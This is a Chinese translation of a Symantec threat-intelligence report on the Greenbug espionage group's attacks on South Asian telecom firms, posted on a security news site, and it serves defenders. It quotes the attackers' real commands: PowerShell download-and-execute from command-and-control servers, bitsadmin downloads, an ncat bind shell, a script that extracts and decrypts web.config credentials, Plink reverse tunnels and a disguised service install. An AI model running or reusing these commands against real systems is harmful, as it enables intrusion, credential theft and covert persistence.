对Greenbug组织针对南亚电信行业攻击活动的分析 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com

对Greenbug组织针对南亚电信行业攻击活动的分析

h1apwn 新闻 2020-07-07 11:35:00
收藏

导语:Greenbug间谍组织正在对南亚的电信公司进行APT攻击,活动最早发生在2020年4月。

Greenbug间谍组织正在对南亚的电信公司进行APT攻击,活动最早发生在2020年4月。

有迹象表明,至少有一家公司最早于2019年4月成为攻击目标。

电子邮件似乎是该组织使用的初始感染媒介。Greenbug在这些攻击中混合使用了现成的工具和开源技术。该组织似乎有兴趣获得对数据库服务器的访问权限;我们看到它窃取凭据,然后使用被窃取的凭据测试与这些服务器的连接。

据信,Greenbug可能来自伊朗。过去,有人猜测它与Shamoon组织有联系,该组织对沙特阿拉伯的组织进行了磁盘攻击。Shamoon攻击已被广泛涵盖,但[尚不清楚攻击者如何窃取凭据,使他们可以将破坏性恶意软件引入受害者系统。赛门铁克在2017年进行的研究发现了证据,表明Greenbug在涉及W32.Disttrack.B(Shamoon的恶意软件)的攻击之前已在组织的网络中。还未明确建立这种联系,但认为这两个组织之间的合作是可能的。

我们在这次攻击活动中看到的许多活动与过去从Greenbug中看到的活动是一致的,包括使用电子邮件作为初始感染媒介,使用公开可用的黑客工具(如Mimikatz和Plink)以及专注于收集凭据并在受害网络上维持访问的状态。

0x01 感染载荷

在多台受害机器上,通过Internet浏览器执行了一个名为proposal_pakistan110.chm:error.html的文件。我们还看到存档程序工具正在打开同一文件。尽管我们无法检索文件进行分析,但Greenbug早在2016年就利用了相同的技术。在这些较早的攻击中,电子邮件被发送到目标,其中包含指向可能受到感染的站点的链接,该站点托管了一个存档文件。该档案文件包含一个恶意的CHM文件(编译的HTML帮助文件),其中包括一个ADS以隐藏其payload,该文件在执行时已安装。此文件通常还包含诱饵PDF文件,其中包含错误消息,提示无法正确打开该文件。

我们还看到过去在其他组织中使用了类似名称的文件来删除Trojan.Ismdoor,这是Greenbug的自定义恶意软件。

在看到该文件的大约同一时间,还执行了一个名为GRUNTStager.hta的文件。赛门铁克认为,攻击者使用了可公开获得的后利用框架,以在其目标中初步立足。

 https://github.com/cobbr/Covenant/

Covenant是一个公开可用的黑客工具,被描述为“ .NET命令和控制框架,旨在突出.NET的攻击面,使进攻性.NET工具的使用更加轻松,并充当协作式命令和控制平台。 ” 它被描述为供“Red Team”使用,但也容易被恶意行为者滥用。

0x02 六个月的入侵

从2019年10月到2020年4月,Greenbug出现在一个组织的系统中。它似乎对获得对该组织的数据库服务器的访问感兴趣。观察到攻击者在受害者系统上执行了各种PowerShell命令。

第一个活动发生在2019年10月11日,当时执行了恶意的PowerShell命令以安装CobaltStrike Beacon模块以下载下一阶段的payload。

我们能够从PowerShell命令中提取两个命令和控制(C&C)服务器地址。

最初,攻击者利用此访问权限执行PowerShell,以确定通过$ PSVersionTable安装的PowerShell版本。此后,我们发现攻击者继续尝试下载托管在先前提到的同一C&C服务器上的恶意文件。

 PowerShell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $L.downloadstring('http://95[.]179.177.157:445/0Zu5WpWN');

该命令已执行了几次,但不清楚攻击者是否成功。大约一个小时后,还观察到攻击者试图通过bitsadmin实用程序下载到CSIDL_APPDATA \ a8f4.exe。

 bitsadmin /transfer a8f4 http://95.179.177.157:8081/asdfd CSIDL_APPDATA\a8f4.exe

BITS管理实用程序可用于下载或上传要执行的作业。这是一个合法工具,我们会看到恶意行为者对其滥用,攻击者使用此工具将其他恶意工具下载到了受感染的计算机上。

不久之后,攻击者从CSIDL_SYSTEM86 \ [REDACTED]目录执行了一些工具:

1590516728593.png

然后看到攻击者正在启动PowerShell,并尝试执行名为msf.ps1的PowerShell脚本。

 PowerShell.exe -ExecutionPolicy Bypass -File CSIDL_SYSTEM_DRIVE\[REDACTED]\msf.ps1

该命令执行了几次,可能用于安装Metasploit payload以保留对受感染机器的访问。那是当天的最后一次活动。

直到2020年2月6日,当执行可疑的PowerShell命令时,才观察到进一步的活动。PowerShell命令遵循w3wp.exe进程的执行– w3wp.exe进程是用于向Web应用程序提供请求的应用程序。这可能表明攻击者已在受感染计算机上使用了Webshell。

以下是攻击者执行的PowerShell命令的副本:

 $ErrorActionPreference = 'SilentlyContinue';$path="C:\[REDACTED]\";Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp\$tempdir;$aspnet_regiis = (get-childitem $env:windir\microsoft.net\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + ' -pdf ""connectionStrings"" ' + $env:temp + '\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp\$tempdir\$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host ""$file.Fullname --- $_.connectionString""} } };

此命令用于搜索类似于web.config的文件。对于找到的每个文件,它将在可能的情况下提取用户名和密码信息,并使用aspnet_regiis.exe实用工具对其进行解密。这些凭据可用于访问组织资源,例如SQL Server。

2月12日和2月14日看到了进一步的活动。2月12日,攻击者返回并执行了一个工具:pls.exe。一个小时后,攻击者使用netcat通过以下命令将cmd.exe绑定到侦听端口:

 CSIDL_SYSTEM_DRIVE\[REDACTED]\infopagesbackup\ncat.exe [REDACTED] 8989 -e cmd.exe

大约20分钟后再次发出相同的命令。

两天后,当地时间上午7.29,攻击者返回并连接到侦听端口,启动cmd.exe。

他们发出了以下命令:

1590516840013.png

第二天(2月15日),攻击者返回命令提示符,并发布了添加用户的命令,然后检查是否添加了该用户。直到3月4日,才在本地时间6.30pm启动PowerShell命令时才观察到进一步的活动。还观察到一个WMI命令正在执行,并用于搜索特定帐户。此后不久,从%USERPROFILE%\ documents \ x64执行了著名的凭据窃取工具Mimikatz。

3月11日,攻击者可能尝试使用PowerShell来连接到数据库服务器,大概是使用他们窃取的凭据。攻击者还使用SQL命令检索数据库服务器的版本信息,大概是为了测试凭据和连通性。

 PowerShell -C
 $conn=new-object System.Data.SqlClient.SQLConnection(" ""Data
 Source=[REDACTED];User [REDACTED] { $conn.Open(); }Catch { continue;
 }$cmd = new-object System.Data.SqlClient.SqlCommand(" ""select
 @@version;" "", $conn);$ds=New-Object
 system.Data.DataSet;$da=New-Object
 system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill($ds);$ds.Tables[0];$conn.Close();""

四月份看到进一步的活动。4月8日,观察到可疑的PowerShell命令试图从远程主机下载工具。

 PowerShell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://185.205.210.46:1003/iO0RBYy3O');
 PowerShell.exe -nop -w hidden -c $m=new-object net.webclient;$m.proxy=[Net.WebRequest]::GetSystemWebProxy();$m.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $m.downloadstring('http://185.205.210.46:1131/t8daWgy9j13');

那是4月8日看到的唯一活动,然后4月13日启动了PowerShell,并且观察到以下命令正在执行:

1590516904305.png

接下来,使用PowerShell将数据库连接到数据库服务器并检查版本信息,从而可能确认工作凭据。这与先前观察到的PowerShell命令类似,只是数据库服务器IP地址不同。

最后,攻击者使用PowerShell通过arp -a命令查看当前ARP表(最近与之通信的计算机的IP和主机名)。那是我们在这台机器上观察到的最后一个活动。

在此计算机上发现了许多可疑文件(请参阅IoC)。这些文件包括如前所述的Covenant工具和Mimikatz,以及可用于将shellcode加载到受害机器上的现成工具Cobalt Strike,以及多个webshell。

0x03 同一网络上的机器

我们在同一受害者网络上的各种机器上看到可疑活动。攻击者使用相同的文件proposal_pakistan110.chm:error.html将组织中的其他几个用户作为目标,该文件是由存档工具打开的,在某些情况下是通过Microsoft Edge浏览器打开的。之后,我们观察到在计算机上正在执行后门程序,以及从攻击者的基础结构下载到%APPDATA%目录的其他工具。

1590516935949.png

0x04 回传数据到攻击者

在该组织的一台计算机上,我们在12月9日看到了一些可疑的PowerShell命令。PowerShell执行的文件之一comms.exe是Plink。第二个类似的命令使用了Bitvise命令行隧道客户端。两种工具都用于建立通向攻击者控制的基础结构的隧道,以允许终端服务和RDP访问内部计算机。

 "CSIDL_COMMON_APPDATA\comms\comms.exe" apps.vvvnews.com -P  -l  -pw  -proxytype http_basic –proxyip [REDACTED] -proxyport 8080 -proxyuser [REDACTED].haq -proxypass [REDACTED] -C -R [REDACTED]:4015:[REDACTED]:1540
  
 
 "CSIDL_COMMON_APPDATA\comms\comms.exe" [REDACTED] -pw=[REDACTED] -s2c=[REDACTED] 1819 [REDACTED] 3389 -proxy=y -proxyType=HTTP -proxyServer=[REDACTED] -proxyPort=8080 -proxyUsername=[REDACTED]\[REDACTED].haq -proxyPassword=

诸如Plink和Bitvise之类的工具是合法的sysadmin工具,但之前曾被恶意行为者利用,包括今年早些时候的伊朗攻击者

 https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/

在该组织的第二台计算机上还看到了Plink,该计算机似乎已从2019年11月到2020年4月受到威胁。该计算机上的第一个可疑活动是在11月13日看到的,当时在该计算机上启用了PowerShell Remoting以允许它接收PowerShell命令。

使用PowerShell命令从攻击者控制的基础结构中下载文件,并使用特定参数启动该文件。

 (New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yft.dat', 'C:\Programdata\VMware\Vmware.exe');
 start-process C:\Programdata\VMware\Vmware.exe -arg 'L3NlcnZlcj12c2llZ3J1LmNvbSAvaWQ9NDE=';

该参数解码为/server=vsiegru.com / id = 41。此后不久,便执行了Plink实用程序以建立与受害者网络的连接。然后执行第二个PowerShell命令,如下所示:

 Del -force C:\Programdata\Vmware\Vmware.exe;
 (New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yf.dat', 'C:\Programdata\Nt.dat');
 move C:\Programdata\Nt.dat C:\Programdata\Vmware\VMware.exe -force;
 cmd.exe /c sc create "VMwareUpdate" binpath= "C:\Programdata\Vmware\VMware.exe L3NlcnZlcj1rb3BpbGthb3J1a292LmNvbSAvaWQ9NDkgL3Byb3h5PXllcyAvcHJveHl1cmw…[REDACTED]…BUTUxcamF2ZWQubmFiaSAvcGFzc3dvcmQ9cHRtbEAyMjMz" displayname= "VMware Update Service" start= auto;
 start-service VMwareUpdate;
 Exit;

编码的参数解码为以下内容:

 /server=kopilkaorukov.com /id=49 /proxy=yes /proxyurl=http://[REDACTED]:8080 /credential=yes /username=[REDACTED]\[REDACTED] /password=[REDACTED]

然后看到攻击者在该计算机的管理员组中添加了一个用户。大约一周后的11月16日,又在该计算机上执行了另外两个PowerShell命令。

第一个解码为以下内容:

 iex ((New-Object Net.WebClient).DownloadString('http://apps[.]vvvnews.com:8080/Default.htt'))

由于攻击者已使用Plink工具建立了隧道,所有连接似乎都在路由到内部计算机IP地址。这样做可能是为了逃避检测。

0x05 针对电信行业的攻击

Greenbug在此活动中的活动似乎表明,这些受害者的主要重点是窃取凭据,并在受害者的网络上保持访问权限,以便攻击者可以在其上保持相当长的一段时间。这是我们过去在Greenbug受害者中看到的典型活动,保持受害者网络的持久性似乎是该组织的主要目标之一。在以前的攻击活动中,还观察到Greenbug是针对同一地区的电信公司的。

隧道的建立表明了保持低调对于这个群体而言是多么重要。它的重点是窃取凭据,并建立与数据库服务器的连接,这表明它旨在实现对受害者网络的高级别访问-这种访问如果被利用,可能会很快对受感染的网络造成破坏。如果参与者使用破坏性恶意软件或勒索软件加以利用,则这种访问级别可能会很快关闭组织的整个网络。

Greenbug的先前受害者包括航空,政府,投资和教育部门以及电信部门的组织,2017年袭击了中东的电信组织。2019年,我们观察到18个民族国家支持的针对全球电信行业。

也许很难理解为什么由电话提供商和互联网服务提供商(ISP)组成的电信行业对APT团体具有吸引力,而APT团体的主要动机通常是收集情报。电信公司对呼叫,通信日志和消息的访问使它们成为这些攻击者的宝贵目标。

我们只能推测Greenbug瞄准这些特定电信公司的动机,但是很明显,对受害网络的全面持久的访问仍然是该组织的主要目标。

0x06 保护措施

赛门铁克产品通过以下检测来防范此威胁:

· Trojan.Ismdoor

· Trojan.Ismdoor!gen1

· System Infected: Trojan.Ismdoor Activity

0x07 IoCs

image.png

本文翻译自:https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia如若转载,请注明原文地址:
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论